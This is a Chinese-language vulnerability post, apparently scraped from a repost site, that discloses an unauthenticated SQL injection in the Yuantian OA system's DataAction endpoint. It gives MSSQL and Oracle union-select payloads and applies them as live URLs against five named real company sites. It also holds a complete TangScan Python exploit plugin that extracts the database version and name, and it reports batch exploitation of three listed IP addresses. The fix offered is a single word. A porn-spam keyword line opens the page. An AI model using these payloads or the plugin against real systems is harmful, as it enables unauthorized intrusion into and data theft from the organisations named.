午夜精品福利视频,亚洲激情专区,免费看a网站,aa毛片,亚洲色图激情小说,亚洲一级毛片,免费一级毛片一级毛片aa

某OA通用型SQL注入漏洞 -電腦資料

電腦資料 時間:2019-01-01 我要投稿
【m.stanzs.com - 電腦資料】

    1)通用型SQL注入漏洞廠商:源天軟件

    網(wǎng)址:http://www.visionsoft.com.cn/

    漏洞鏈接:ServiceAction/com.velcro.base.DataAction

    說明:該oa系統(tǒng)使用mssql和oracle兩個類型的數(shù)據(jù)庫,

某OA通用型SQL注入漏洞

。案例分別給出兩種類型的利用poc。

    利用POC:

    MsSql數(shù)據(jù)庫:

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true

    Oracle數(shù)據(jù)庫:

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    (直接訪問即可):

    MsSql部分

    A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    Oracle部分

    D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true

    2)說好的為了支持 TangScan 而來直接給出編寫好的插件代碼(本人代碼盲,瞎寫的,大牛勿噴),等公布時,該插件已經(jīng)入庫 TangScan.com 。

#! /usr/bin/env python# -*- coding: utf-8 -*-"""Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)See the file 'docs/COPYING' for copying permissionauthor: fate0"""import refrom thirdparty import requestsfrom modules.exploit import TSExploit__all__ = ['TangScan']class TangScan(TSExploit):    def __init__(self):        super(self.__class__, self).__init__()        self.info = {            "name": "源天軟件OA辦公系統(tǒng) sql 注入MSSQL版漏洞(無需登錄)",            "product": "源天",            "product_version": "",            "desc": """                OA辦公系統(tǒng) /ServiceAction/com.velcro.base.DataAction 中的 sql 參數(shù)存在注入, 將導致敏感數(shù)據(jù)泄漏            """,            "license": self.license.TS,            "author": ["Coody"],            "ref": [                {self.ref.wooyun: "暫無"},            ],            "type": self.type.injection,            "severity": self.severity.high,            "privileged": False,            "disclosure_date": "2015-07-22",            "create_date": "2015-07-23",        }        self.register_option({            "url": {                "default": "",                "required": True,                "choices": [],                "convert": self.convert.url_field,                "desc": "目標 url"            }        })        self.register_result({            "status": False,            "data": {                "db_info": {                    "version": "",                    "current_db": ""                }            },            "description": "",            "error": ""        })    def verify(self):        self.print_debug("verify start")        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))        try:            response = requests.get(exp_url, timeout=15, verify=False)        except Exception, e:            self.result.error = str(e)            return        re_result = re_version_pattern.findall(response.content)        if len(re_result) == 0:            self.result.status = False            return        self.result.status = True        self.result.data.db_info.version = re_result[0]        self.result.description = "目標 {url} 存在sql注入, 目標使用數(shù)據(jù)庫版本為: {db_version}".format(            url=self.option.url,            db_version=re_result[0]        )    def exploit(self):        self.print_debug("exploit start")        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))        try:            response = requests.get(exp_url, timeout=15, verify=False)        except Exception, e:            self.result.error = str(e)            return        re_result = re_userinfo_pattern.findall(response.content)        if len(re_result) == 0:            self.result.status = False            return        self.result.status = True        self.result.data.db_info.current_db = re_result[0]        self.result.description = "目標 {url} 存在sql注入, 數(shù)據(jù)庫名稱為: {current_db}".format(            url=self.option.url,            current_db=self.result.data.db_info.current_db        )if __name__ == '__main__':    from modules.main import main    main(TangScan())
看下執(zhí)行插件后的結(jié)果:

    執(zhí)行 --mode verify (默認)

   

    執(zhí)行 --mode exploit

   

    插件運行正常,能夠順利輸出數(shù)據(jù),

電腦資料

某OA通用型SQL注入漏洞》(http://m.stanzs.com)。。。。。。

    到這里本來應該結(jié)束了

    但是我手賤

    給出批量檢測網(wǎng)站的腳本測試結(jié)果

    測試的網(wǎng)站分別是:

    http://60.12.113.234:8080/

    http://121.14.195.31:8081/

    http://218.246.22.194:8080/

    測試中,直接執(zhí)行 --mode exploit ,批量獲取數(shù)據(jù)庫名稱吧。

   

    測試完畢,看下結(jié)果文件 success.txt 內(nèi)容

   

    嗯、到這里該結(jié)束了···

   

解決方案:

    過濾

最新文章